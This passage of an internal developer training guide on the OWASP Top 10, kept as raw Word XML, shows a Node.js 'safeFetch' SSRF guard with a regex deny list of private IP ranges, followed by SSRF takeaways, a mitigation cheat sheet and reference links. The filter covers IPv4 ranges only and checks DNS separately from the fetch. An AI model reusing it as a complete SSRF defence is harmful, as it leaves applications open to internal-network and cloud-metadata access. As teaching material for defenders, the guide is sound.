              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const dns = require('dns').promises;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const net = require('net');</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async function isPrivateIp(hostname) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  try {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    const { address } = await dns.lookup(hostname);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    // Block loopback, link-local, and private ranges</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return /^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.|169\.254\.)/.test(address);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  } catch { return true; }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">async function safeFetch(userUrl) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  const parsed = new URL(userUrl);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (!['http:', 'https:'].includes(parsed.protocol)) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    throw new Error('Only HTTP/HTTPS allowed');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (await isPrivateIp(parsed.hostname)) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    throw new Error('Private/internal addresses not allowed');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  return fetch(userUrl, { redirect: 'error' }); // block redirects</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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A10 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Never fetch user-provided URLs without validating the destination</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Use an allowlist of permitted domains and protocols</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. After DNS resolution, validate the resolved IP is not private/internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. In AWS, enable IMDSv2 to make cloud metadata SSRF harder</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Features that fetch remote content (preview, webhook, import) are high-risk SSRF candidates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Reference — Developer Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this summary during code reviews and security assessments as a reminder of the key mitigations for each OWASP category.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Defence</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A01</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Broken Access Control</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Server-side authz checks; deny by default; anti-CSRF tokens; validate JWT alg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A02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Cryptographic Failures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bcrypt/Argon2id for passwords; env vars for secrets; HTTPS/HSTS everywhere</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A03</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Injection (SQLi / XSS)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Prepared statements; output encoding; DOMPurify; Content-Security-Policy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A04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Insecure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Threat modelling; least privilege; fail-secure defaults; security requirements</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A05</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Security Misconfiguration</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Disable XXE; suppress error details; hardening checklist; security headers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A06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Vulnerable Components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SBOM; npm audit / Snyk in CI/CD; pin &amp; update dependencies; remove unused libs</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A07</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Auth Failures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MFA; rate limiting; bcrypt; Secure/HttpOnly/SameSite cookies; no token logging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A08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Integrity Failures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Avoid deserialisation of untrusted data; JSON over binary; sign packages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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2E75B6"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A09</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Logging Failures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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Log auth/authz events; centralised logs; alerts; Canary Tokens; IR plan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A10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URL allowlist; validate resolved IP; block private ranges; disable redirects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Further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URL / Description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OWASP Top 10 (2021)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https://owasp.org/Top10/</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OWASP Cheat Sheet Series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https://cheatsheetseries.owasp.org/</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XSS Filter Evasion Cheat Sheet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https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html</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PortSwigger Web Security Academy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https://portswigger.net/web-security (free, hands-on labs)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HaveIBeenPwned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https://haveibeenpwned.com (check breached credentials)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Canary Tokens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https://canarytokens.org (free tripwire service)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XS-Leaks Wiki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https://xsleaks.dev</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JWT Debugger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https://jwt.io</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SQL Injection Reference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https://websec.ca/kb/sql_injection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niebezpiecznik.pl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security blog and training provider (source material)</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Confidential — Internal Training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2E75B6"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Web Application Security — Developer Training Guide</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	OWASP Top 10 (2021)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2026-03-15T21:57:00.348Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-15T21:57:00.348Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>